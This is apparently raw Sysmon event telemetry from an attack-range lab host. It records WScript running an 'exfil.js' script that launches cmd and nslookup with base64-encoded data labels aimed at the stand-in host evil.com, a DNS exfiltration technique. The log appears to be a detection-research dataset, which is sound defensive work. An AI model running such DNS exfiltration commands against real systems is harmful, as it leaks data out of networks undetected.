14:21:43.255{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.255{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.255{2E1864BB-18F7-629A-4245-000000005F02}2824C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F7-629A-4045-000000005F02}6116C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvfpfp.tmp 2>&1 10341000x8000000000000000212916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.223{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-4145-000000005F02}2668C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.223{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-4145-000000005F02}2668C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.223{2E1864BB-18F7-629A-4145-000000005F02}26685400C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-4045-000000005F02}6116C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.208{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-4145-000000005F02}2668C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.208{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.208{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.208{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.208{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.208{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-4045-000000005F02}6116C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.208{2E1864BB-18E0-629A-6742-000000005F02}39765956C:\Windows\System32\WScript.exe{2E1864BB-18F7-629A-4045-000000005F02}6116C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.214{2E1864BB-18F7-629A-4045-000000005F02}6116C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvfpfp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.192{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfxlufo.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.155{2E1864BB-18F7-629A-3E45-000000005F02}51521636C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-3F45-000000005F02}2764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.155{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.155{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.155{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.155{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.155{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-3F45-000000005F02}2764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.155{2E1864BB-18F7-629A-3D45-000000005F02}42961104C:\Windows\system32\cmd.exe{2E1864BB-18F7-629A-3F45-000000005F02}2764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.164{2E1864BB-18F7-629A-3F45-000000005F02}2764C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F7-629A-3D45-000000005F02}4296C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfxlufo.tmp 2>&1 10341000x8000000000000000212896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.139{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-3E45-000000005F02}5152C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.139{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-3E45-000000005F02}5152C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.139{2E1864BB-18F7-629A-3E45-000000005F02}51521636C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-3D45-000000005F02}4296C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.123{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-3E45-000000005F02}5152C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.123{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.123{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.123{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.123{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 